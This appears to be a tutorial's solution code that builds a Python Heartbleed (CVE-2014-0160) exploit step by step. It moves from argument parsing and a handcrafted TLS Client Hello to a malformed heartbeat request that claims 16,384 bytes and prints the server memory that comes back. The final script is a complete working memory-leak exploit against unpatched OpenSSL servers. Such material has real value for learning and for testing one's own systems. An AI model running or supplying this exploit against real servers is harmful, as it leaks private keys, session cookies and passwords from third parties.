Exploiting CVE-2014-0160 Solutions

Build Your Command Center

# Version string interpolated into the --help banner; it must be a string
# literal because a bare 0.0.0 is not valid Python syntax.
__version__ = '0.0.0'
import argparse


def build_argument_parser():
    """Parse the command line and return the resulting namespace.

    Despite its name, this function returns the result of ``parse_args()``
    (an ``argparse.Namespace`` with ``domain`` and ``port``), not the parser.

    ``port`` is declared with ``nargs="?"`` so that the advertised default
    of 443 is actually applied when the argument is omitted; argparse
    ignores ``default`` on a positional argument that is required.
    """
    parser = argparse.ArgumentParser(description=f"""
 ██░ ██ ▓█████ ▄▄▄       ██▀███  ▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄
▓██░ ██▒▓█   ▀▒████▄    ▓██ ▒ ██▒▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
▒██▀▀██░▒███  ▒██  ▀█▄  ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
░▓█ ░██ ▒▓█  ▄░██▄▄▄▄██ ▒██▀▀█▄  ░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
░▓█▒░██▓░▒████▒▓█   ▓██▒░██▓ ▒██▒  ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
 ▒ ░░▒░▒░░ ▒░ ░▒▒   ▓▒█░░ ▒▓ ░▒▓░  ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒
 ▒ ░▒░ ░ ░ ░  ░ ▒   ▒▒ ░  ░▒ ░ ▒░    ░    ▒░▒   ░ ░ ░ ▒  ░ ░ ░  ░ ░ ░  ░ ░ ▒  ▒
 ░  ░░ ░   ░    ░   ▒     ░░   ░   ░       ░    ░   ░ ░      ░      ░    ░ ░  ░
 ░  ░  ░   ░  ░     ░  ░   ░               ░          ░  ░   ░  ░   ░  ░   ░
                                                 ░                        ░
Version: {__version__}
""", formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("domain", help="the domain which you wish to test for Heartbleed")
    parser.add_argument(
        "port",
        nargs="?",  # optional positional, so the default below takes effect
        type=int,
        default=443,
        help="the port which you wish to test for Heartbleed, default is 443",
    )
    return parser.parse_args()


if __name__ == '__main__':
    # Script entry point: parse the command line and keep the resulting
    # namespace in the module-level name `args`.
    args = build_argument_parser()

Handling Sockets

# Version string interpolated into the --help banner; it must be a string
# literal because a bare 0.0.0 is not valid Python syntax.
__version__ = '0.0.0'
import argparse
import logging
import socket

def hex2bytes(payload: str) -> bytes:
    """Convert a hex dump string into the raw bytes it describes.

    ``bytes.fromhex`` skips ASCII whitespace between byte pairs (including
    newlines on Python 3.7+), so multi-line dumps can be passed directly.

    Raises:
        ValueError: if *payload* contains anything other than hex digit pairs
            and whitespace.
    """
    return bytes.fromhex(payload)


# Pre-built Client Hello sent right after connecting.
# The first five bytes are the record header: content type 0x16 (22),
# version 0x0302 and length 0x00dc, i.e. 220 bytes follow the header.
# Built with hex2bytes(), the helper defined above (the previous call to
# `h2bin` referenced a name that does not exist in this script).
hello = hex2bytes('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

def build_argument_parser():
    """Parse the command line and return the resulting namespace.

    Despite its name, this function returns the result of ``parse_args()``
    (an ``argparse.Namespace`` with ``domain`` and ``port``), not the parser.

    ``port`` is declared with ``nargs="?"`` so that the advertised default
    of 443 is actually applied when the argument is omitted; argparse
    ignores ``default`` on a positional argument that is required.
    """
    parser = argparse.ArgumentParser(description=f"""
 ██░ ██ ▓█████ ▄▄▄       ██▀███  ▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄
▓██░ ██▒▓█   ▀▒████▄    ▓██ ▒ ██▒▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
▒██▀▀██░▒███  ▒██  ▀█▄  ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
░▓█ ░██ ▒▓█  ▄░██▄▄▄▄██ ▒██▀▀█▄  ░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
░▓█▒░██▓░▒████▒▓█   ▓██▒░██▓ ▒██▒  ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
 ▒ ░░▒░▒░░ ▒░ ░▒▒   ▓▒█░░ ▒▓ ░▒▓░  ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒
 ▒ ░▒░ ░ ░ ░  ░ ▒   ▒▒ ░  ░▒ ░ ▒░    ░    ▒░▒   ░ ░ ░ ▒  ░ ░ ░  ░ ░ ░  ░ ░ ▒  ▒
 ░  ░░ ░   ░    ░   ▒     ░░   ░   ░       ░    ░   ░ ░      ░      ░    ░ ░  ░
 ░  ░  ░   ░  ░     ░  ░   ░               ░          ░  ░   ░  ░   ░  ░   ░
                                                 ░                        ░
Version: {__version__}
""", formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("domain", help="the domain which you wish to test for Heartbleed")
    parser.add_argument(
        "port",
        nargs="?",  # optional positional, so the default below takes effect
        type=int,
        default=443,
        help="the port which you wish to test for Heartbleed, default is 443",
    )
    return parser.parse_args()

def main(runtime_options: argparse.Namespace):
    """Connect to the target and send the pre-built Client Hello.

    Args:
        runtime_options: parsed command line; its ``domain`` and ``port``
            attributes select the TCP endpoint to connect to.

    The socket is closed when the function returns.
    """
    # Read the endpoint from the parameter (not from a module-level global)
    # and use the attribute name the parser defines: ``domain``.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as socks:
        logging.info('Connecting...')
        socks.connect((runtime_options.domain, runtime_options.port))
        logging.info('Sending Client Hello...')
        # sendall() keeps writing until the whole message has been handed to
        # the kernel; send() may transmit only a prefix.
        socks.sendall(hello)


if __name__ == '__main__':
    # Script entry point: parse the command line into the module-level name
    # `args`, then run the connection logic with it.
    args = build_argument_parser()
    main(args)

Waiting for a Response & recvall()

# Version string interpolated into the --help banner; it must be a string
# literal because a bare 0.0.0 is not valid Python syntax.
__version__ = '0.0.0'

import argparse
import logging
import socket
import struct

import hexdump

def hex2bytes(payload: str) -> bytes:
    """Convert a hex dump string into the raw bytes it describes.

    ``bytes.fromhex`` skips ASCII whitespace between byte pairs (including
    newlines on Python 3.7+), so multi-line dumps can be passed directly.

    Raises:
        ValueError: if *payload* contains anything other than hex digit pairs
            and whitespace.
    """
    return bytes.fromhex(payload)


# Pre-built Client Hello sent right after connecting.
# The first five bytes are the record header: content type 0x16 (22),
# version 0x0302 and length 0x00dc, i.e. 220 bytes follow the header.
# Built with hex2bytes(), the helper defined above (the previous call to
# `h2bin` referenced a name that does not exist in this script).
hello = hex2bytes('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

def recvall(sock, count):
    """Read exactly *count* bytes from *sock*.

    A single ``recv`` call may return fewer bytes than requested, so this
    keeps reading until the requested amount has arrived.

    Args:
        sock: object with a ``recv(n)`` method, e.g. a connected socket.
        count: number of bytes to read; 0 returns ``b''`` without reading.

    Returns:
        The bytes read, or ``None`` if the peer closed the connection before
        *count* bytes were received.
    """
    chunks = []
    remaining = count
    while remaining:
        piece = sock.recv(remaining)
        if not piece:
            # recv() returning b'' means the peer closed the connection.
            return None
        chunks.append(piece)
        remaining -= len(piece)
    return b''.join(chunks)

def build_argument_parser():
    """Parse the command line and return the resulting namespace.

    Despite its name, this function returns the result of ``parse_args()``
    (an ``argparse.Namespace`` with ``domain`` and ``port``), not the parser.

    ``port`` is declared with ``nargs="?"`` so that the advertised default
    of 443 is actually applied when the argument is omitted; argparse
    ignores ``default`` on a positional argument that is required.
    """
    parser = argparse.ArgumentParser(description=f"""
 ██░ ██ ▓█████ ▄▄▄       ██▀███  ▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄
▓██░ ██▒▓█   ▀▒████▄    ▓██ ▒ ██▒▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
▒██▀▀██░▒███  ▒██  ▀█▄  ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
░▓█ ░██ ▒▓█  ▄░██▄▄▄▄██ ▒██▀▀█▄  ░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
░▓█▒░██▓░▒████▒▓█   ▓██▒░██▓ ▒██▒  ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
 ▒ ░░▒░▒░░ ▒░ ░▒▒   ▓▒█░░ ▒▓ ░▒▓░  ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒
 ▒ ░▒░ ░ ░ ░  ░ ▒   ▒▒ ░  ░▒ ░ ▒░    ░    ▒░▒   ░ ░ ░ ▒  ░ ░ ░  ░ ░ ░  ░ ░ ▒  ▒
 ░  ░░ ░   ░    ░   ▒     ░░   ░   ░       ░    ░   ░ ░      ░      ░    ░ ░  ░
 ░  ░  ░   ░  ░     ░  ░   ░               ░          ░  ░   ░  ░   ░  ░   ░
                                                 ░                        ░
Version: {__version__}
""", formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("domain", help="the domain which you wish to test for Heartbleed")
    parser.add_argument(
        "port",
        nargs="?",  # optional positional, so the default below takes effect
        type=int,
        default=443,
        help="the port which you wish to test for Heartbleed, default is 443",
    )
    return parser.parse_args()

def main(runtime_options: argparse.Namespace):
    """Connect, send the Client Hello and read records until Server Hello Done.

    Args:
        runtime_options: parsed command line; its ``domain`` and ``port``
            attributes select the TCP endpoint to connect to.

    Returns early (after logging a warning) if the server closes the
    connection before the handshake completes. The heartbeat request itself
    is not sent here; only the announcement is logged. The socket is closed
    when the function returns.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as socks:
        logging.info('Connecting...')
        # Use the parameter and the attribute name the parser defines.
        socks.connect((runtime_options.domain, runtime_options.port))
        logging.info('Sending Client Hello...')
        socks.sendall(hello)

        while True:
            # The 5-byte record header is: type (1), version (2), length (2).
            # recvall() is used because recv() may return a short read.
            header = recvall(socks, 5)
            if header is None:
                logging.warning('Unexpected EOF receiving record header - server closed connection')
                return
            (content_type, version, length) = struct.unpack('>BHH', header)
            handshake = recvall(socks, length)
            if handshake is None:
                logging.warning('Unexpected EOF receiving record payload - server closed connection')
                return
            logging.info(f"Received message: type={content_type}, ver={version}, length={len(handshake)}")

            # Content type 22 is a handshake record; a first byte of 0x0E is
            # the Server Hello Done message. Slicing avoids an IndexError on
            # an empty record, and bytes indexing already yields an int.
            if content_type == 22 and handshake[:1] == b'\x0e':
                break

        logging.info('Handshake done...')
        logging.info('Sending heartbeat request with length 4.')

if __name__ == '__main__':
    # Script entry point: parse the command line into the module-level name
    # `args`, then run the handshake logic with it.
    args = build_argument_parser()
    main(args)

Exploiting Heartbleed

import argparse
import logging
import socket
import struct

import hexdump

# Version string interpolated into the --help banner built by
# build_argument_parser().
__version__ = '0.0.1'


def h2bin(payload: str):
    """Decode a hex dump string (byte pairs separated by whitespace) to bytes."""
    decoded = bytes.fromhex(payload)
    return decoded


# Pre-built Client Hello that main() sends right after connecting.
# The first five bytes are the record header: content type 0x16 (22),
# version 0x0302 and length 0x00dc, i.e. 220 bytes follow the header.
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Heartbeat request sent by test_heartbleed().
# Line 1 is the record header: content type 0x18 (24), version 0x0302 and
# length 0x0003. Line 2 is the 3-byte record body: message type 0x01 followed
# by a claimed payload length of 0x4000 (16384) - no payload bytes follow.
heartbeat = h2bin('''
18 03 02 00 03
01 40 00
''')

'''
Explanation of the heartbeat call:
    18      : heartbeat record
    03 02   : TLS version
    00 03   : length
    01      : heartbeat request
    40 00   : payload length, 16 384 bytes; see RFC 6520:
                "The total length of a HeartbeatMessage MUST NOT exceed 2^14"
                If we enter FF FF -> 65 535, we will receive 4 packets of 16 384 bytes each
'''

def identify_content_type(content_type_as_int: int) -> str:
    """Return the TLS record ContentType name for a numeric content type.

    The original definition was a truncated ``if`` statement (a syntax
    error); it is completed here as a lookup of the standard ContentType
    values from RFC 5246 (20-23) and RFC 6520 (24).

    Args:
        content_type_as_int: first byte of a TLS record header.

    Returns:
        The ContentType name, or ``"unknown"`` for any other value.
    """
    names = {
        20: "change_cipher_spec",
        21: "alert",
        22: "handshake",
        23: "application_data",
        24: "heartbeat",
    }
    return names.get(content_type_as_int, "unknown")


def hex_dump(sock: bytes) -> None:
    """Print a hex dump of a received record payload to stdout.

    Args:
        sock: the raw payload bytes to dump. The parameter keeps its original
            name for compatibility with keyword callers, but it is the data
            read from the socket, not a socket object - hence the ``bytes``
            annotation.
    """
    print(hexdump.dump(sock, size=4, sep='-'))


def recvall(sock: socket, count: int):
    """Read exactly ``count`` bytes from ``sock``.

    Keeps calling ``sock.recv`` until the requested amount has arrived,
    because a single call may deliver fewer bytes than asked for.

    Returns the collected bytes, or ``None`` when ``recv`` yields an empty
    result (connection closed) before ``count`` bytes were read.
    """
    pieces = []
    remaining = count
    while remaining:
        piece = sock.recv(remaining)
        if not piece:
            return None
        pieces.append(piece)
        remaining -= len(piece)
    return b''.join(pieces)


def test_heartbleed(sock: socket.socket) -> bool:
    """Send the heartbeat request and inspect the server's reply.

    Records are read one at a time until a heartbeat record (type 24) or an
    alert record (type 21) arrives; records of any other type are skipped.

    Args:
        sock: connected socket on which the handshake has already been done.

    Returns:
        True if a heartbeat response was received (whether or not it carried
        extra data), False if the server sent an alert or closed the
        connection.
    """
    # sendall() keeps writing until the whole request has been handed over.
    sock.sendall(heartbeat)

    while True:
        # Record header: content type (1 byte), version (2), length (2).
        # http://wiki.wireshark.org/SSL
        # recvall() is used instead of recv(5): recv() may return a short
        # read, and signals EOF with b'' (never None), which would otherwise
        # crash struct.unpack below.
        content_version_length = recvall(sock, 5)
        if content_version_length is None:
            logging.warning('Unexpected EOF receiving record header - server closed connection')
            return False
        (content_type, _version, length) = struct.unpack('>BHH', content_version_length)

        # A single recv(length) is not enough: the server may deliver the
        # record in several smaller chunks.
        payload = recvall(sock, length)
        if payload is None:
            logging.warning('Unexpected EOF receiving record payload - server closed connection')
            return False

        # Heartbeat content type is 24, see RFC 6520.
        if content_type == 24:
            # The dump goes to stdout; no file is written.
            print('Received heartbeat response:')
            hex_dump(payload)
            # The request body was 3 bytes; anything longer is leaked data.
            if len(payload) > 3:
                logging.critical('Server returned more data than it should - server is vulnerable!')
            else:
                logging.warning('Server processed malformed heartbeat, but did not return any extra data.')
            return True

        # Alert record.
        if content_type == 21:
            logging.info('Received alert:')
            hex_dump(payload)
            logging.info('Server returned error, likely not vulnerable')
            return False


def build_argument_parser():
    """Parse the command line and return the resulting namespace.

    Despite its name, this function returns the result of ``parse_args()``
    (an ``argparse.Namespace`` with ``host`` and ``port``), not the parser.

    ``port`` is declared with ``nargs="?"`` so that the advertised default
    of 443 is actually applied when the argument is omitted; argparse
    ignores ``default`` on a positional argument that is required.
    """
    parser = argparse.ArgumentParser(description=f"""
 ██░ ██ ▓█████ ▄▄▄       ██▀███  ▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄
▓██░ ██▒▓█   ▀▒████▄    ▓██ ▒ ██▒▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
▒██▀▀██░▒███  ▒██  ▀█▄  ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
░▓█ ░██ ▒▓█  ▄░██▄▄▄▄██ ▒██▀▀█▄  ░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
░▓█▒░██▓░▒████▒▓█   ▓██▒░██▓ ▒██▒  ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
 ▒ ░░▒░▒░░ ▒░ ░▒▒   ▓▒█░░ ▒▓ ░▒▓░  ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒
 ▒ ░▒░ ░ ░ ░  ░ ▒   ▒▒ ░  ░▒ ░ ▒░    ░    ▒░▒   ░ ░ ░ ▒  ░ ░ ░  ░ ░ ░  ░ ░ ▒  ▒
 ░  ░░ ░   ░    ░   ▒     ░░   ░   ░       ░    ░   ░ ░      ░      ░    ░ ░  ░
 ░  ░  ░   ░  ░     ░  ░   ░               ░          ░  ░   ░  ░   ░  ░   ░
                                                 ░                        ░
Version: {__version__}
""", formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("host", help="the host that you wish to test for Heartbleed")
    parser.add_argument(
        "port",
        nargs="?",  # optional positional, so the default below takes effect
        type=int,
        default=443,
        help="the port which you wish to test for Heartbleed, default is 443",
    )
    return parser.parse_args()


def main(runtime_options: argparse.Namespace):
    """Run the Heartbleed check against the host given on the command line.

    Connects, sends the Client Hello, reads records until the Server Hello
    Done message arrives, then hands the socket to ``test_heartbleed``.

    Args:
        runtime_options: parsed command line; its ``host`` and ``port``
            attributes select the TCP endpoint to connect to.

    Returns early (after logging a warning) if the server closes the
    connection before the handshake completes. The socket is closed when the
    function returns.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        logging.info('Connecting...')
        sock.connect((runtime_options.host, runtime_options.port))

        logging.info('Sending Client Hello...')
        # sendall() keeps writing until the whole message has been handed
        # over; send() may transmit only a prefix.
        sock.sendall(hello)

        # Read handshake records until the server is done.
        while True:
            # The 5-byte record header is: type (1), version (2), length (2).
            # recvall() guards against short reads and reports EOF as None.
            hdr = recvall(sock, 5)
            if hdr is None:
                logging.warning('Unexpected EOF receiving record header - server closed connection')
                return
            (content_type, version, length) = struct.unpack('>BHH', hdr)
            hand = recvall(sock, length)
            if hand is None:
                logging.warning('Unexpected EOF receiving record payload - server closed connection')
                return
            logging.info(' ... received message: type = %d, ver = %04x, length = %d',
                         content_type, version, len(hand))
            # Look for server hello done message: a handshake record (type
            # 22) whose first byte is 0x0E. Slicing avoids an IndexError on
            # an empty record.
            if content_type == 22 and hand[:1] == b'\x0e':
                break

        logging.info('Handshake done...')
        logging.info('Sending heartbeat request with length 4:')
        test_heartbleed(sock)


if __name__ == '__main__':
    # Script entry point: parse the command line into the module-level name
    # `args`, then run the Heartbleed check with it.
    args = build_argument_parser()
    main(args)